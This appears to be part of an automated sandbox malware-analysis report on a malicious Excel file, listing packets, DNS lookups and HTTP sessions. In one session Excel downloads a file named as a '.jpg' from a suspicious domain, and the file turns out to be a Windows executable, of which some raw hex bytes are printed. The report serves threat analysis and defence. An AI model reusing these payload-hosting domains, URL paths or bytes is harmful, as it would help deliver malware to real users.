                                                                                                                                                                                              Jul 6, 2021 15:07:34.441308022 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.441333055 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.441699982 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.442303896 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.442320108 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.442446947 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.443361044 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.443376064 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.444370031 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.444386005 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.444490910 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.444504976 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.445391893 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.445415020 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.445744991 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.446759939 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.446784019 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.447168112 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.447498083 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.447510958 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.447580099 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.448457003 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.448478937 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449503899 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449518919 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449599028 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.449611902 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.450508118 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.450639963 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.451268911 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.451859951 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.451881886 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452313900 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452528954 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452543020 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.452609062 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.453598976 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.453613997 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.453722954 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.454617977 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.454632044 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.454854965 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.455626011 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.455641031 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.455791950 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.456650972 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.456662893 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.456851006 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487211943 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487229109 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487247944 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487426996 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487440109 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487462997 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487622976 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.487664938 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488230944 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488253117 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488265991 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.488809109 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489068031 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489083052 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489099979 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489372015 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489883900 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489905119 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.489932060 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490704060 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490726948 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490739107 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490848064 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490875006 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.490883112 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491532087 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491547108 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491564989 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.491693974 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.492373943 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.492393017 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.497618914 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:34.656478882 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:34.694731951 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.697809935 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:34.698215961 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:34.737066031 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:35.427088022 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:35.427238941 CEST8049175104.21.37.209192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:35.429447889 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:07:36.480303049 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                              Jul 6, 2021 15:07:36.480566025 CEST4917580192.168.2.22104.21.37.209
                                                                                                                                                                                              Jul 6, 2021 15:09:24.138870001 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:09:24.139281034 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:09:24.139580011 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178111076 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178282976 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178539038 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:09:24.178606033 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                              Jul 6, 2021 15:09:24.180530071 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:09:24.180599928 CEST4916780192.168.2.22172.67.198.51

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jul 6, 2021 15:07:24.266448975 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:24.331594944 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.506598949 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:24.574628115 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:24.792174101 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:24.851367950 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.753261089 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:25.831001997 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:25.852262974 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:25.909544945 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.136984110 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:27.207706928 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:27.220160961 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:27.285522938 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:29.116636038 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:29.176505089 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:29.194570065 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:29.249245882 CEST53551718.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:31.052112103 CEST5249653192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:31.106637001 CEST53524968.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:31.115422010 CEST5756453192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:31.161294937 CEST53575648.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:33.312329054 CEST6300953192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:33.366873026 CEST53630098.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:33.381632090 CEST5931953192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:33.436418056 CEST53593198.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.521521091 CEST5307053192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:34.582590103 CEST53530708.8.8.8192.168.2.22
                                                                                                                                                                                              Jul 6, 2021 15:07:34.597621918 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                              Jul 6, 2021 15:07:34.654891968 CEST53597708.8.8.8192.168.2.22

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                              Jul 6, 2021 15:07:24.266448975 CEST192.168.2.228.8.8.80x2c09Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:24.506598949 CEST192.168.2.228.8.8.80xd8c3Standard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:24.792174101 CEST192.168.2.228.8.8.80x26d4Standard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.753261089 CEST192.168.2.228.8.8.80x6848Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.852262974 CEST192.168.2.228.8.8.80x26aeStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:27.136984110 CEST192.168.2.228.8.8.80x4335Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:27.220160961 CEST192.168.2.228.8.8.80x63f2Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.116636038 CEST192.168.2.228.8.8.80x6e2bStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.194570065 CEST192.168.2.228.8.8.80xbb9fStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:31.052112103 CEST192.168.2.228.8.8.80x8ff4Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:31.115422010 CEST192.168.2.228.8.8.80x7a0aStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.312329054 CEST192.168.2.228.8.8.80x1363Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.381632090 CEST192.168.2.228.8.8.80x916aStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:34.521521091 CEST192.168.2.228.8.8.80xb77dStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:34.597621918 CEST192.168.2.228.8.8.80xbdabStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                              Jul 6, 2021 15:07:24.331594944 CEST8.8.8.8192.168.2.220x2c09No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:24.331594944 CEST8.8.8.8192.168.2.220x2c09No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:24.574628115 CEST8.8.8.8192.168.2.220xd8c3No error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:24.574628115 CEST8.8.8.8192.168.2.220xd8c3No error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:24.851367950 CEST8.8.8.8192.168.2.220x26d4No error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:24.851367950 CEST8.8.8.8192.168.2.220x26d4No error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.831001997 CEST8.8.8.8192.168.2.220x6848No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.831001997 CEST8.8.8.8192.168.2.220x6848No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.831001997 CEST8.8.8.8192.168.2.220x6848No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.909544945 CEST8.8.8.8192.168.2.220x26aeNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.909544945 CEST8.8.8.8192.168.2.220x26aeNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:25.909544945 CEST8.8.8.8192.168.2.220x26aeNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:27.207706928 CEST8.8.8.8192.168.2.220x4335No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:27.207706928 CEST8.8.8.8192.168.2.220x4335No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:27.285522938 CEST8.8.8.8192.168.2.220x63f2No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:27.285522938 CEST8.8.8.8192.168.2.220x63f2No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.176505089 CEST8.8.8.8192.168.2.220x6e2bNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.176505089 CEST8.8.8.8192.168.2.220x6e2bNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.176505089 CEST8.8.8.8192.168.2.220x6e2bNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.249245882 CEST8.8.8.8192.168.2.220xbb9fNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.249245882 CEST8.8.8.8192.168.2.220xbb9fNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:29.249245882 CEST8.8.8.8192.168.2.220xbb9fNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:31.106637001 CEST8.8.8.8192.168.2.220x8ff4No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:31.106637001 CEST8.8.8.8192.168.2.220x8ff4No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:31.161294937 CEST8.8.8.8192.168.2.220x7a0aNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:31.161294937 CEST8.8.8.8192.168.2.220x7a0aNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.366873026 CEST8.8.8.8192.168.2.220x1363No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.366873026 CEST8.8.8.8192.168.2.220x1363No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.366873026 CEST8.8.8.8192.168.2.220x1363No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.436418056 CEST8.8.8.8192.168.2.220x916aNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.436418056 CEST8.8.8.8192.168.2.220x916aNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:33.436418056 CEST8.8.8.8192.168.2.220x916aNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:34.582590103 CEST8.8.8.8192.168.2.220xb77dNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:34.582590103 CEST8.8.8.8192.168.2.220xb77dNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:34.654891968 CEST8.8.8.8192.168.2.220xbdabNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                              Jul 6, 2021 15:07:34.654891968 CEST8.8.8.8192.168.2.220xbdabNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • thousandsyears.download
                                                                                                                                                                                              • voopeople.fun
                                                                                                                                                                                              • uppercilio.fun
                                                                                                                                                                                              • astrocycle.download

                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              0192.168.2.2249167172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              Jul 6, 2021 15:07:24.390232086 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: thousandsyears.download
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450352907 CEST2INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:07:24 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 4274
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VmvIn%2Bt8%2B%2Ba%2BScS%2FFU7rDNbdB4WhaK8GW%2F4tLDa5Y6N6ikv7oKqorLg9y1o%2Bo%2Bk1gOD%2FvsRhWJxxpzT1vTrLYdrRIy3DXL3BZlXJM6eVgPsCSrit2ZzKB%2B7T3%2BL3Ywtv19W0rJU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 66a90e4d9f024e3d-FRA
                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450381994 CEST3INData Raw: 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: @.pdata@@
                                                                                                                                                                                              Jul 6, 2021 15:07:24.450397968 CEST4INData Raw: 24 50 47 00 00 00 8b 05 76 dc 00 00 35 89 b4 5a f6 89 05 6b dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00
                                                                                                                                                                                              Data Ascii: $PGv5Zk$#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?$
